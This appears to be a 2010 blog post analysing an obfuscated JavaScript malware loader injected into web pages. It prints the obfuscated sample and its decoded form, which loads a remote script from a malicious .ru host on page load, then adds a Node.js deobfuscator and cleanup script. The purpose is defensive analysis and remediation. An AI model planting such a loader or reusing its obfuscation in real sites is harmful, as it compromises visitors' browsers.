Friday, May 21, 2010

Malware Attack, Reply Comment

I refer to the recent comment on my previous malware attack post from 1.5 years ago. Basically, the obfuscated script carried out a lot of string substitutions so that no recognisable string (the tag name "script", the remote hostname) ever appears in the file, which lets it slip past any filter that matches on fixed patterns.

Below is a sample my friend sent me 3 months ago.

/*GNU GPL*/ try{window.onload = function(){
 var Qq73s8yh02ptue2rq = document.createElement('s&(^c@#r$^i(@)p&@t($&'.replace(/#|\!|\(|&|@|\$|\^|\)/ig, ''));
 Qq73s8yh02ptue2rq.setAttribute('type', 'text/javascript');
 Qq73s8yh02ptue2rq.setAttribute('src', 'h!!t(#(t#)^p(^!(:&$/$$$/$@)&h!^c&3$6^))#^0&-@!&c!o$()m&^&.))g(l^((o)b&$#e&!)@7#^.!(c)##)o@)m#^.(@$k#(&)i^n$)#o^^@(-#)&$t@@^o)!.!@$^v)&i!@)e^#w&h$&o&&m)((e#s)$!a@$l^^e).$(r)^&u(:(((!8&^@0!!8)))0^/#!)f#@r!i&&!)e$n&d&f!$e&#e)$d)^.!c(^o)()^m^/@$f#(^!r#^@&@i(^e&n@(&(d$!f&!#e#!e@@$#@d).^!c#^^^o^@!!m)($/$b!l#u^^$^e&$@@#h@^o))&!s#@$$t&#.@@@c)^(&o@m()^/$(^v^^$#e#o$#h)(&.^$@c)(o^$)$m&/#g(!^o^^o!(^g@!&l!^#!^e&.&@c)!o)@&m!/(#!^^'.replace(/\$|\(|@|\!|\)|#|\^|&/ig, ''));
 Qq73s8yh02ptue2rq.setAttribute('defer', 'defer');
 Qq73s8yh02ptue2rq.setAttribute('id', 'U&!^(y&$2(#3^9#^b)$$x^#k#^@9##)5(&t#@'.replace(/&|\!|\)|\^|\(|\$|@|#/ig, ''));
 document.body.appendChild(Qq73s8yh02ptue2rq);
}} catch(e) {}

Once the browser's JavaScript interpreter has evaluated the replace() calls, you get the code below. Each replace() simply deletes the junk characters from a string, so the garbage is only there to hide the real values from a scanner. The loader dynamically creates a <script> element pointing at a remote host and appends it to the body, so the payload is fetched and run automatically as soon as the page has finished loading.

/*GNU GPL*/ try{window.onload = function(){
 var Qq73s8yh02ptue2rq = document.createElement('script');
 Qq73s8yh02ptue2rq.setAttribute('type','text/javascript');
 // the remote payload; this is the indicator to block and to search your files for
 Qq73s8yh02ptue2rq.setAttribute('src','http://hc360-com.globe7.com.kino-to.viewhomesale.ru:8080/friendfeed.com/friendfeed.com/bluehost.com/veoh.com/google.com/');
 Qq73s8yh02ptue2rq.setAttribute('defer','defer');
 Qq73s8yh02ptue2rq.setAttribute('id','Uy239bxk95t');
 document.body.appendChild(Qq73s8yh02ptue2rq);
}} catch(e) {}

If your HTML or JS files contain a window.onload handler that is not yours, you can apply the same trick in reverse: strip the junk characters to see where the script points, then run 'sed' over the files to cut the injected block out. Bear in mind that cleaning the files only removes the symptom: unless you also find and close the way the attacker got write access to them, the block will be back.
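As an added example (this is not code from the original post), here is a small Node.js script that does the decoding above statically and then performs the cleanup pass. It resolves every 'literal'.replace(/a|b|c/ig, '') call by rewriting the text, so the attacker's script is never executed, and it locates the decoded loader by its structure (a try{window.onload = function(){ ... createElement ... }} catch(e) {} block) rather than by the /*GNU GPL*/ marker alone. The obfuscated sample is the one from this post; the infected page it is tested against is constructed for the example, and the assumption is that the obfuscation only ever uses the "delete these characters" shape seen here.

```javascript
'use strict';
// Added example, not code from the original post: static deobfuscation plus
// cleanup of the window.onload loader family shown above.

// Constructed input: the obfuscated loader from the post, on one line (String.raw keeps the backslashes).
const SAMPLE = String.raw`/*GNU GPL*/ try{window.onload = function(){var Qq73s8yh02ptue2rq = document.createElement('s&(^c@#r$^i(@)p&@t($&'.replace(/#|\!|\(|&|@|\$|\^|\)/ig, ''));Qq73s8yh02ptue2rq.setAttribute('type', 'text/javascript');Qq73s8yh02ptue2rq.setAttribute('src', 'h!!t(#(t#)^p(^!(:&$/$$$/$@)&h!^c&3$6^))#^0&-@!&c!o$()m&^&.))g(l^((o)b&$#e&!)@7#^.!(c)##)o@)m#^.(@$k#(&)i^n$)#o^^@(-#)&$t@@^o)!.!@$^v)&i!@)e^#w&h$&o&&m)((e#s)$!a@$l^^e).$(r)^&u(:(((!8&^@0!!8)))0^/#!)f#@r!i&&!)e$n&d&f!$e&#e)$d)^.!c(^o)()^m^/@$f#(^!r#^@&@i(^e&n@(&(d$!f&!#e#!e@@$#@d).^!c#^^^o^@!!m)($/$b!l#u^^$^e&$@@#h@^o))&!s#@$$t&#.@@@c)^(&o@m()^/$(^v^^$#e#o$#h)(&.^$@c)(o^$)$m&/#g(!^o^^o!(^g@!&l!^#!^e&.&@c)!o)@&m!/(#!^^'.replace(/\$|\(|@|\!|\)|#|\^|&/ig, ''));Qq73s8yh02ptue2rq.setAttribute('defer', 'defer');Qq73s8yh02ptue2rq.setAttribute('id', 'U&!^(y&$2(#3^9#^b)$$x^#k#^@9##)5(&t#@'.replace(/&|\!|\)|\^|\(|\$|@|#/ig, ''));document.body.appendChild(Qq73s8yh02ptue2rq);}} catch(e) {}`;

// Shape of the calls this family uses:  'LITERAL'.replace(/ALTERNATION/FLAGS, '')
const REPLACE_CALL = /'([^'\\]*)'\.replace\(\/((?:\\.|[^\/\\])+)\/([a-z]*)\s*,\s*''\)/g;
const REGEX_META = new Set('.^$*+?()[]{}|\\');

// Turns  #|\!|\(|&  into the set of characters it deletes. Anything that is not a
// plain list of single characters (\d, ., a*, ...) yields null, so an attacker-supplied
// regex of any other shape is never compiled or run here.
function alternationToCharSet(alternation) {
  const chars = new Set();
  for (const alt of alternation.split('|')) {
    if (alt.length === 1 && !REGEX_META.has(alt)) chars.add(alt);
    else if (alt.length === 2 && alt[0] === '\\' && !/[A-Za-z0-9]/.test(alt[1])) chars.add(alt[1]);
    else return null;
  }
  return chars;
}

// Deletes the listed characters from the literal, honouring the /i flag.
function stripChars(literal, chars, caseInsensitive) {
  const fold = (c) => (caseInsensitive ? c.toLowerCase() : c);
  const drop = new Set(Array.from(chars, fold));
  return Array.from(literal).filter((c) => !drop.has(fold(c))).join('');
}

// Rewrites each recognised replace() call into the literal it evaluates to;
// calls of an unrecognised shape are left in place for manual review.
function decodeReplaceCalls(script) {
  return script.replace(REPLACE_CALL, (whole, literal, alternation, flags) => {
    const chars = alternationToCharSet(alternation);
    if (chars === null) return whole;
    return `'${stripChars(literal, chars, flags.includes('i'))}'`;
  });
}

// try{window.onload = function(){ ... createElement ... }} catch(e) {}, with the
// optional /*GNU GPL*/ marker. createElement must occur before the catch, so a
// site's own try/onload handler that creates no element is not matched.
const LOADER_BLOCK = /(?:\/\*GNU GPL\*\/\s*)?try\s*\{\s*window\.onload\s*=\s*function\s*\(\)\s*\{(?:(?!catch)[\s\S])*?createElement[\s\S]*?\}\s*\}\s*catch\s*\(\s*e\s*\)\s*\{\s*\}/g;

// Lists every loader block in a page or .js file together with the URL it would load.
function findLoaders(text) {
  const found = [];
  for (const m of text.matchAll(LOADER_BLOCK)) {
    const decoded = decodeReplaceCalls(m[0]);
    const src = /setAttribute\('src',\s*'([^']*)'\)/.exec(decoded);
    found.push({ index: m.index, block: m[0], src: src ? src[1] : null });
  }
  return found;
}

// Cuts the loader blocks out (the sed pass from the post, done in code), then
// removes any inline <script> tag the cut left empty; external tags with a src are kept.
function stripLoaders(text) {
  return text.replace(LOADER_BLOCK, '').replace(/<script(?![^>]*\bsrc=)[^>]*>\s*<\/script>/g, '');
}

// Constructed infected page: the site's own scripts plus the injected loader.
const INFECTED = [
  '<html><head><script src="/js/site.js"></script>',
  '<script>try{window.onload = function(){ initMenu(); }} catch(e) {}</script>',
  '</head><body><p>hello</p>',
  '<script>' + SAMPLE + '</script>',
  '</body></html>',
].join('\n');

function main() {
  console.log(decodeReplaceCalls(SAMPLE));
  console.log(findLoaders(INFECTED).map((l) => l.src));
  console.log(stripLoaders(INFECTED));
}
main();
```

Review the output of findLoaders() before running stripLoaders() on a real site: legitimate loaders (analytics and ad snippets) create script elements in exactly the same way, so the decoded src, not the shape of the block, is what tells an injection from a loader you installed yourself.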
